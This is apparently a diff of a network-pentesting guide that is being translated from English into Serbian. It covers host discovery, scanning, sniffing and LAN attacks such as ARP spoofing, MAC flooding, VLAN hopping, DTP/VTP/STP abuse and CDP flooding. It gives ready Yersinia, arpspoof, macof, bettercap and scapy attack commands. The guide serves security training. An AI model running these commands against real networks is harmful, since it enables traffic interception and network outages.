to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed: +Ako ste unutar mreže, jedna od prvih stvari koje ćete želeti da uradite je da **otkrijete druge hostove**. 
U zavisnosti od **koliko buke** možete/želite da napravite, različite akcije se mogu izvesti: -### Passive - -You can use these tools to passively discover hosts inside a connected network: +### Pasivno +Možete koristiti ove alate za pasivno otkrivanje hostova unutar povezane mreže: ```bash netdiscover -p p0f -i eth0 -p -o /tmp/p0f.log @@ -87,12 +73,10 @@ net.recon on/off #Read local ARP cache periodically net.show set net.show.meta true #more info ``` +### Aktivno -### Active - -Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\ -But, as you are in the **same network** as the other hosts, you can do **more things**: - +Napomena da se tehnike komentarisane u [_**Otkrivanju hostova sa spolja**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP otkrivanje portova_) takođe mogu **primeniti ovde**.\ +Ali, pošto ste u **isto mreži** kao i ostali hostovi, možete raditi **više stvari**: ```bash #ARP discovery nmap -sn #ARP Requests (Discover IPs) 
@@ -112,39 +96,35 @@ set net.probe.throttle 10 #10ms between probes sent (default=10) #IPv6 alive6 # Send a pingv6 to multicast. ``` - ### Active ICMP -Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\ -But, as you are in the **same network** as the other hosts, you can do **more things**: +Napomena da se tehnike komentarisane u _Otkrivanju hostova sa spolja_ ([_**ICMP**_](./#icmp)) takođe mogu **primeniti ovde**.\ +Ali, pošto ste u **istoј mreži** kao i ostali hostovi, možete uraditi **više stvari**: -- If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255` -- Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255` -- Use the `-PE`, `-PP`, `-PM` flags of `nmap`to perform host discovery sending respectively **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24` +- Ako **pingujete** **adresu za emitovanje podmreže**, ping bi trebao da stigne do **svakog hosta** i oni bi mogli da **odgovore** **vama**: `ping -b 10.10.5.255` +- Pingovanjem **adresu za emitovanje mreže** mogli biste čak pronaći hostove unutar **drugih podmreža**: `ping -b 255.255.255.255` +- Koristite `-PE`, `-PP`, `-PM` zastavice `nmap` za otkrivanje hostova slanjem **ICMPv4 echo**, **vremenskih oznaka**, i **zahteva za masku podmreže:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24` ### **Wake On Lan** -Wake On Lan is used to **turn on** computers through a **network message**. 
The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.\ -Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.\ -If **no \[MAC]** is provided, the packet is sent to **broadcast ethernet** (and the broadcast MAC will be the one being repeated). - +Wake On Lan se koristi za **uključivanje** računara putem **mrežne poruke**. Magični paket koji se koristi za uključivanje računara je samo paket u kojem je **MAC Dst** naveden, a zatim se **ponavlja 16 puta** unutar istog paketa.\ +Ove vrste paketa se obično šalju u **ethernet 0x0842** ili u **UDP paket na port 9**.\ +Ako **nema \[MAC]** naveden, paket se šalje na **emitovanje ethernet** (a emitovani MAC će biti onaj koji se ponavlja). ```bash # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain) wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847 wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9 ``` +## Skenerisanje hostova -## Scanning Hosts - -Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed. +Kada otkrijete sve IP adrese (spoljašnje ili unutrašnje) koje želite detaljno skenirati, mogu se izvršiti različite radnje. ### TCP -- **Open** port: _SYN --> SYN/ACK --> RST_ -- **Closed** port: _SYN --> RST/ACK_ -- **Filtered** port: _SYN --> \[NO RESPONSE]_ -- **Filtered** port: _SYN --> ICMP message_ - +- **Otvoren** port: _SYN --> SYN/ACK --> RST_ +- **Zatvoren** port: _SYN --> RST/ACK_ +- **Filtriran** port: _SYN --> \[NEMA ODGOVORA]_ +- **Filtriran** port: _SYN --> ICMP poruka_ ```bash # Nmap fast scan for the most 1000tcp ports used nmap -sV -sC -O -T4 -n -Pn -oA fastscan 
@@ -156,16 +136,14 @@ nmap -sV -sC -O -p- -n -Pn -oA fullscan #Bettercap Scan syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000 ``` - ### UDP -There are 2 options to scan an UDP port: +Postoje 2 opcije za skeniranje UDP porta: -- Send a **UDP packet** and check for the response _**ICMP unreachable**_ if the port is **closed** (in several cases ICMP will be **filtered** so you won't receive any information inf the port is close or open). -- Send a **formatted datagrams** to elicit a response from a **service** (e.g., DNS, DHCP, TFTP, and others, as listed in _nmap-payloads_). If you receive a **response**, then, the port is **open**. - -**Nmap** will **mix both** options using "-sV" (UDP scans are very slow), but notice that UDP scans are slower than TCP scans: +- Pošaljite **UDP paket** i proverite odgovor _**ICMP unreachable**_ ako je port **zatvoren** (u nekoliko slučajeva ICMP će biti **filtriran** pa nećete dobiti nikakve informacije ako je port zatvoren ili otvoren). +- Pošaljite **formatirane datagrame** da izazovete odgovor od **usluge** (npr., DNS, DHCP, TFTP i druge, kako je navedeno u _nmap-payloads_). Ako dobijete **odgovor**, tada je port **otvoren**. +**Nmap** će **kombinovati obe** opcije koristeći "-sV" (UDP skeniranja su veoma spora), ali imajte na umu da su UDP skeniranja sporija od TCP skeniranja: ```bash # Check if any of the most common udp services is running udp-proto-scanner.pl 
@@ -177,38 +155,34 @@ nmap -sU -sV -sC -n -F -T4 nmap -sU -sV --version-intensity 0 -n -T4 # You could use nmap to test all the UDP ports, but that will take a lot of time ``` - ### SCTP Scan -**SCTP (Stream Control Transmission Protocol)** is designed to be used alongside **TCP (Transmission Control Protocol)** and **UDP (User Datagram Protocol)**. Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in **Signaling System 7 (SS7)**. **SCTP** is a core component of the **SIGTRAN** protocol family, which aims to transport SS7 signals over IP networks. +**SCTP (Stream Control Transmission Protocol)** je dizajniran da se koristi zajedno sa **TCP (Transmission Control Protocol)** i **UDP (User Datagram Protocol)**. Njegova glavna svrha je da olakša transport telefonskih podataka preko IP mreža, odražavajući mnoge karakteristike pouzdanosti koje se nalaze u **Signaling System 7 (SS7)**. **SCTP** je osnovna komponenta **SIGTRAN** protokol porodice, koja ima za cilj transport SS7 signala preko IP mreža. -The support for **SCTP** is provided by various operating systems, such as **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, and **VxWorks**, indicating its broad acceptance and utility in the field of telecommunication and networking. - -Two different scans for SCTP are offered by nmap: _-sY_ and _-sZ_ +Podršku za **SCTP** pružaju različiti operativni sistemi, kao što su **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, i **VxWorks**, što ukazuje na njegovu široku prihvaćenost i korisnost u oblasti telekomunikacija i umrežavanja. 
+Dva različita skeniranja za SCTP nudi nmap: _-sY_ i _-sZ_ ```bash # Nmap fast SCTP scan nmap -T4 -sY -n -oA SCTFastScan # Nmap all SCTP scan nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ``` - -### IDS and IPS evasion +### IDS i IPS izbegavanje {{#ref}} ids-evasion.md {{#endref}} -### **More nmap options** +### **Više nmap opcija** {{#ref}} nmap-summary-esp.md {{#endref}} -### Revealing Internal IP Addresses - -**Misconfigured routers, firewalls, and network devices** sometimes respond to network probes using **nonpublic source addresses**. **tcpdump** can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the **eth2 interface**, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out. +### Otkivanje unutrašnjih IP adresa +**Pogrešno konfigurisani ruteri, vatrozidi i mrežni uređaji** ponekad odgovaraju na mrežne probe koristeći **nejavne izvorne adrese**. **tcpdump** se može koristiti za identifikaciju paketa primljenih sa privatnih adresa tokom testiranja. Konkretno, na Kali Linuxu, paketi se mogu uhvatiti na **eth2 interfejsu**, koji je dostupan sa javnog Interneta. Važno je napomenuti da, ako je vaša konfiguracija iza NAT-a ili vatrozida, takvi paketi verovatno neće biti propušteni. ```bash tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
@@ -216,30 +190,24 @@ listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64 IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64 ``` - ## Sniffing -Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing. +Sniffing možete saznati detalje o IP opsezima, veličinama podmreža, MAC adresama i nazivima hostova pregledanjem uhvaćenih okvira i paketa. Ako je mreža pogrešno konfigurisana ili je preklopna tkanina pod stresom, napadači mogu uhvatiti osetljive materijale putem pasivnog mrežnog sniffinga. -If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address. +Ako je preklopna Ethernet mreža pravilno konfigurisana, videćete samo broadcast okvire i materijale namenjene vašoj MAC adresi. ### TCPDump - ```bash sudo tcpdump -i udp port 53 #Listen to DNS request to discover what is searching the host tcpdump -i icmp #Listen to icmp packets sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &" ``` - -One can, also, capture packets from a remote machine over an SSH session with Wireshark as the GUI in realtime. - +Može se, takođe, uhvatiti pakete sa udaljenog računara preko SSH sesije koristeći Wireshark kao GUI u realnom vremenu. ``` ssh user@ tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i - ssh @ tcpdump -i -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic ``` - ### Bettercap - ```bash net.sniff on net.sniff stats 
@@ -248,23 +216,21 @@ set net.sniff.local #If true it will consider packets from/to this computer, ot set net.sniff.filter #BPF filter for the sniffer (default=not arp) set net.sniff.regexp #If set only packets matching this regex will be considered ``` - ### Wireshark -Obviously. +Očigledno. ### Capturing credentials -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Možete koristiti alate kao što je [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa. -## LAN attacks +## LAN napadi ### ARP spoofing -ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed. +ARP Spoofing se sastoji od slanja besplatnih ARP odgovora kako bi se naznačilo da IP mašine ima MAC našeg uređaja. Tada će žrtva promeniti ARP tabelu i kontaktiraće našu mašinu svaki put kada želi da kontaktira spoofovani IP. #### **Bettercap** - ```bash arp.spoof on set arp.spoof.targets #Specific targets to ARP spoof (default=) 
@@ -272,37 +238,31 @@ set arp.spoof.whitelist #Specific targets to skip while spoofing set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false) set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false) ``` - #### **Arpspoof** - ```bash echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -t 192.168.1.1 192.168.1.2 arpspoof -t 192.168.1.2 192.168.1.1 ``` - ### MAC Flooding - CAM overflow -Overflow the switch’s CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic). - +Preplavite CAM tabelu prekidača slanjem velikog broja paketa sa različitim izvorim MAC adresama. Kada je CAM tabela puna, prekidač počinje da se ponaša kao hub (broadcast-uje sav saobraćaj). ```bash macof -i ``` +U modernim prekidačima ova ranjivost je ispravljena. -In modern switches this vulnerability has been fixed. +### 802.1Q VLAN / DTP Napadi -### 802.1Q VLAN / DTP Attacks +#### Dinamičko Trunkovanje -#### Dynamic Trunking +**Dynamic Trunking Protocol (DTP)** je dizajniran kao protokol na link sloju kako bi olakšao automatski sistem za trunkovanje, omogućavajući prekidačima da automatski biraju portove za trunk mod (Trunk) ili non-trunk mod. Implementacija **DTP** se često smatra pokazateljem suboptimalnog dizajna mreže, naglašavajući važnost ručne konfiguracije trunkova samo gde je to neophodno i osiguranje pravilne dokumentacije. -The **Dynamic Trunking Protocol (DTP)** is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to automatically select ports for trunk mode (Trunk) or non-trunk mode. 
The deployment of **DTP** is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation. +Podrazumevano, portovi prekidača su postavljeni da rade u Dynamic Auto modu, što znači da su spremni da iniciraju trunkovanje ako ih obližnji prekidač na to podstakne. Bezbednosna zabrinutost se javlja kada se pentester ili napadač poveže na prekidač i pošalje DTP Desirable okvir, primoravajući port da pređe u trunk mod. Ova akcija omogućava napadaču da enumeriše VLAN-ove kroz analizu STP okvira i zaobiđe VLAN segmentaciju postavljanjem virtuelnih interfejsa. -By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, compelling the port to enter trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces. - -The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) is utilized to monitor an interface, revealing whether a switch is in Default, Trunk, Dynamic, Auto, or Access mode—the latter being the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status. - -Should network vulnerability be identified, the _**Yersinia**_ tool can be employed to "enable trunking" via the DTP protocol, allowing for the observation of packets from all VLANs. +Prisutnost DTP u mnogim prekidačima podrazumevano može biti iskorišćena od strane protivnika da oponaša ponašanje prekidača, čime se stiče pristup saobraćaju kroz sve VLAN-ove. 
Skripta [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) se koristi za praćenje interfejsa, otkrivajući da li je prekidač u Default, Trunk, Dynamic, Auto ili Access modu—potonji je jedina konfiguracija imuna na napade VLAN hopping. Ovaj alat procenjuje status ranjivosti prekidača. +Ukoliko se identifikuje ranjivost mreže, alat _**Yersinia**_ može biti korišćen za "omogućavanje trunkovanja" putem DTP protokola, omogućavajući posmatranje paketa iz svih VLAN-ova. ```bash apt-get install yersinia #Installation sudo apt install kali-linux-large #Another way to install it in Kali 
@@ -313,26 +273,22 @@ yersinia -I #Interactive mode yersinia -G #For graphic mode ``` - ![](<../../images/image (269).png>) -To enumerate the VLANs it's also possible to generate the DTP Desirable frame with the script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. D**o not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. **The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.** - +Da biste enumerisali VLAN-ove, takođe je moguće generisati DTP Desirable okvir pomoću skripte [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. **Ne prekidajte skriptu ni pod kojim okolnostima. Ona injektuje DTP Desirable svake tri sekunde. **Dinamčki kreirani trunk kanali na switch-u žive samo pet minuta. Nakon pet minuta, trunk se gasi.** ``` sudo python3 DTPHijacking.py --interface eth0 ``` +Želeo bih da istaknem da **Access/Desirable (0x03)** označava da je DTP okvir tipa Desirable, što govori portu da pređe u Trunk režim. A **802.1Q/802.1Q (0xa5)** označava tip enkapsulacije **802.1Q**. -I would like to point out that **Access/Desirable (0x03)** indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And **802.1Q/802.1Q (0xa5**) indicates the **802.1Q** encapsulation type. - -By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN 60.** +Analizom STP okvira, **saznajemo o postojanju VLAN 30 i VLAN 60.**
-#### Attacking specific VLANs - -Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\ -If DHCP is not available, then use _ifconfig_ to set a static IP address. +#### Napad na specifične VLAN-ove +Kada znate VLAN ID-ove i IP vrednosti, možete **konfigurisati virtuelno sučelje za napad na specifičan VLAN**.\ +Ako DHCP nije dostupan, koristite _ifconfig_ da postavite statičku IP adresu. ``` root@kali:~# modprobe 8021q root@kali:~# vconfig add eth1 250 @@ -341,13 +297,13 @@ root@kali:~# dhclient eth1.250 Reloading /etc/samba/smb.conf: smbd only. root@kali:~# ifconfig eth1.250 eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65 - inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0 - inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:19 errors:0 dropped:0 overruns:0 frame:0 - TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:0 - RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) +inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0 +inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link +UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 +RX packets:19 errors:0 dropped:0 overruns:0 frame:0 +TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 +collisions:0 txqueuelen:0 +RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 ``` 
@@ -365,31 +321,28 @@ sudo vconfig add eth0 30 sudo ip link set eth0.30 up sudo dhclient -v eth0.30 ``` +#### Automatski VLAN Hopper -#### Automatic VLAN Hopper +Diskutovani napad **Dinamičkog trunkinga i kreiranja virtuelnih interfejsa za otkrivanje hostova unutar** drugih VLAN-ova se **automatski izvršava** alatom: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) -The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) +#### Duplo Tagovanje -#### Double Tagging +Ako napadač zna vrednost **MAC, IP i VLAN ID žrtvovnog hosta**, mogao bi pokušati da **duplo taguje okvir** sa njegovim dodeljenim VLAN-om i VLAN-om žrtve i pošalje paket. Kako **žrtva neće moći da se poveže nazad** sa napadačem, **najbolja opcija za napadača je komunikacija putem UDP-a** sa protokolima koji mogu izvršiti neke zanimljive akcije (kao što je SNMP). -If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols that can perform some interesting actions (like SNMP). - -Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim. +Druga opcija za napadača je da pokrene **TCP port skeniranje lažirajući IP koji kontroliše napadač i koji je dostupan žrtvi** (verovatno putem interneta). 
Tada bi napadač mogao da prisluškuje na drugom hostu koji mu pripada ako primi neke pakete od žrtve. ![](<../../images/image (190).png>) -To perform this attack you could use scapy: `pip install scapy` - +Da biste izvršili ovaj napad, možete koristiti scapy: `pip install scapy` ```python from scapy.all import * # Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker) packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP() sendp(packet) ``` - #### Lateral VLAN Segmentation Bypass -If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case. +Ako imate **pristup switch-u na koji ste direktno povezani**, imate mogućnost da **obiđete VLAN segmentaciju** unutar mreže. Jednostavno **prebacite port u trunk mode** (poznat i kao trunk), kreirajte virtuelne interfejse sa ID-evima ciljanih VLAN-ova i konfigurišite IP adresu. Možete pokušati da zatražite adresu dinamički (DHCP) ili je možete konfigurisati statički. To zavisi od slučaja. {{#ref}} lateral-vlan-segmentation-bypass.md 
@@ -397,143 +350,126 @@ lateral-vlan-segmentation-bypass.md #### Layer 3 Private VLAN Bypass -In certain environments, such as guest wireless networks, **port isolation (also known as private VLAN)** settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network. +U određenim okruženjima, kao što su mreže za goste, **izolacija portova (poznata i kao privatni VLAN)** se implementira kako bi se sprečilo da klijenti povezani na bežični pristupni tačku direktno komuniciraju jedni s drugima. Međutim, identifikovana je tehnika koja može zaobići ove mere izolacije. Ova tehnika koristi ili nedostatak mrežnih ACL-ova ili njihovu nepravilnu konfiguraciju, omogućavajući IP paketima da se rutiraju kroz ruter kako bi došli do drugog klijenta na istoj mreži. -The attack is executed by creating a **packet that carries the IP address of the destination client but with the router's MAC address**. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw. +Napad se izvršava kreiranjem **paketa koji nosi IP adresu odredišnog klijenta, ali sa MAC adresom rutera**. Ovo uzrokuje da ruter greškom prosledi paket ciljanom klijentu. Ovaj pristup je sličan onom koji se koristi u Double Tagging Attacks, gde se sposobnost kontrole hosta dostupnog žrtvi koristi za iskorišćavanje sigurnosne slabosti. -**Key Steps of the Attack:** +**Ključni koraci napada:** -1. **Crafting a Packet:** A packet is specially crafted to include the target client's IP address but with the router's MAC address. 
-2. **Exploiting Router Behavior:** The crafted packet is sent up to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by private VLAN settings. +1. **Kreiranje paketa:** Paket je posebno kreiran da uključuje IP adresu ciljanog klijenta, ali sa MAC adresom rutera. +2. **Iskorišćavanje ponašanja rutera:** Kreirani paket se šalje ka ruteru, koji, zbog konfiguracije, preusmerava paket ka ciljanom klijentu, zaobilazeći izolaciju koju pružaju privatni VLAN postavke. ### VTP Attacks -VTP (VLAN Trunking Protocol) centralizes VLAN management. It utilizes revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases. +VTP (VLAN Trunking Protocol) centralizuje upravljanje VLAN-ovima. Koristi revizione brojeve za održavanje integriteta VLAN baze podataka; svaka izmena povećava ovaj broj. Switch-evi usvajaju konfiguracije sa višim revizionim brojevima, ažurirajući svoje VLAN baze podataka. #### VTP Domain Roles -- **VTP Server:** Manages VLANs—creates, deletes, modifies. It broadcasts VTP announcements to domain members. -- **VTP Client:** Receives VTP announcements to synchronize its VLAN database. This role is restricted from local VLAN configuration modifications. -- **VTP Transparent:** Doesn't engage in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero. +- **VTP Server:** Upravljanje VLAN-ovima—kreira, briše, menja. Emituje VTP obaveštenja članovima domena. +- **VTP Client:** Prima VTP obaveštenja kako bi sinhronizovao svoju VLAN bazu podataka. Ova uloga je ograničena od lokalnih izmena VLAN konfiguracije. +- **VTP Transparent:** Ne učestvuje u VTP ažuriranjima, ali prosleđuje VTP obaveštenja. Nije pogođen VTP napadima, održava konstantan revizioni broj nula. 
#### VTP Advertisement Types -- **Summary Advertisement:** Broadcasted by the VTP server every 300 seconds, carrying essential domain information. -- **Subset Advertisement:** Sent following VLAN configuration changes. -- **Advertisement Request:** Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number. +- **Summary Advertisement:** Emituje ga VTP server svake 300 sekundi, noseći osnovne informacije o domenu. +- **Subset Advertisement:** Šalje se nakon izmena VLAN konfiguracije. +- **Advertisement Request:** Izdaje ga VTP klijent da zatraži Summary Advertisement, obično kao odgovor na otkrivanje višeg revizionog broja konfiguracije. -VTP vulnerabilities are exploitable exclusively via trunk ports as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database, effectively disrupting the network. - -Note: This discussion pertains to VTP version 1 (VTPv1). +VTP ranjivosti se mogu iskoristiti isključivo putem trunk portova, jer VTP obaveštenja cirkulišu samo kroz njih. Post-DTP napadni scenariji mogu se preusmeriti ka VTP-u. Alati poput Yersinia mogu olakšati VTP napade, sa ciljem da unište VLAN bazu podataka, efikasno ometajući mrežu. +Napomena: Ova diskusija se odnosi na VTP verziju 1 (VTPv1). ````bash %% yersinia -G # Launch Yersinia in graphical mode ``` ```` +U Yersinia-inom grafičkom režimu, izaberite opciju za brisanje svih VTP VLAN-ova da biste očistili VLAN bazu podataka. -In Yersinia's graphical mode, choose the deleting all VTP vlans option to purge the VLAN database. 
+### STP Napadi -### STP Attacks - -**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.** +**Ako ne možete da uhvatite BPDU okvire na vašim interfejsima, malo je verovatno da ćete uspeti u STP napadu.** #### **STP BPDU DoS** -Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly. - +Slanjem velikog broja BPDUs TCP (Obaveštenje o promeni topologije) ili Conf (BPDUs koji se šalju kada se topologija kreira) prekidači su preopterećeni i prestaju da rade ispravno. ```bash yersinia stp -attack 2 yersinia stp -attack 3 #Use -M to disable MAC spoofing ``` +#### **STP TCP Napad** -#### **STP TCP Attack** - -When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub - +Kada se pošalje TCP, CAM tabela prekidača će biti obrisana za 15s. Zatim, ako kontinuirano šaljete ovu vrstu paketa, CAM tabela će se neprekidno restartovati (ili svakih 15 sekundi) i kada se restartuje, prekidač se ponaša kao hub. ```bash yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen ``` - #### **STP Root Attack** -The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.\ -This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch. - +Napadač simulira ponašanje prekidača kako bi postao STP root mreže. Tada će više podataka prolaziti kroz njega. 
Ovo je zanimljivo kada ste povezani na dva različita prekidača.\ +To se postiže slanjem BPDUs CONF paketa koji kažu da je **prioritet** vrednost manja od stvarnog prioriteta stvarnog root prekidača. ```bash yersinia stp -attack 4 #Behaves like the root switch yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root ``` - -**If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him** (a MITM attack will be performed). - +**Ako je napadač povezan na 2 prekidača, može postati koren novog stabla i sav saobraćaj između tih prekidača će prolaziti kroz njega** (biće izvršen MITM napad). ```bash yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing" ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages ``` +### CDP napadi -### CDP Attacks +CISCO Discovery Protocol (CDP) je ključan za komunikaciju između CISCO uređaja, omogućavajući im da **identifikuju jedni druge i dele detalje konfiguracije**. -CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to **identify each other and share configuration details**. +#### Pasivno prikupljanje podataka -#### Passive Data Collection +CDP je konfiguran da emituje informacije kroz sve portove, što može dovesti do bezbednosnog rizika. Napadač, prilikom povezivanja na port prekidača, može koristiti mrežne sniffer-e kao što su **Wireshark**, **tcpdump** ili **Yersinia**. Ova akcija može otkriti osetljive podatke o mrežnom uređaju, uključujući njegov model i verziju Cisco IOS-a koju koristi. Napadač može zatim ciljati specifične ranjivosti u identifikovanoj verziji Cisco IOS-a. -CDP is configured to broadcast information through all ports, which might lead to a security risk. 
An attacker, upon connecting to a switch port, could deploy network sniffers like **Wireshark**, **tcpdump**, or **Yersinia**. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version. - -#### Inducing CDP Table Flooding - -A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing: +#### Indukcija CDP tabele poplave +Agresivniji pristup uključuje pokretanje napada uskraćivanja usluge (DoS) preplavljivanjem memorije prekidača, pretvarajući se da su legitimni CISCO uređaji. Ispod je redosled komandi za pokretanje takvog napada koristeći Yersinia, alat za testiranje mreže: ```bash sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices # Alternatively, for a GUI approach: sudo yersinia -G ``` - -During this attack, the switch's CPU and CDP neighbor table are heavily burdened, leading to what is often referred to as **“network paralysis”** due to the excessive resource consumption. +Tokom ovog napada, CPU prekidača i CDP tabela suseda su jako opterećeni, što dovodi do onoga što se često naziva **“paraliza mreže”** zbog prekomerne potrošnje resursa. #### CDP Impersonation Attack - 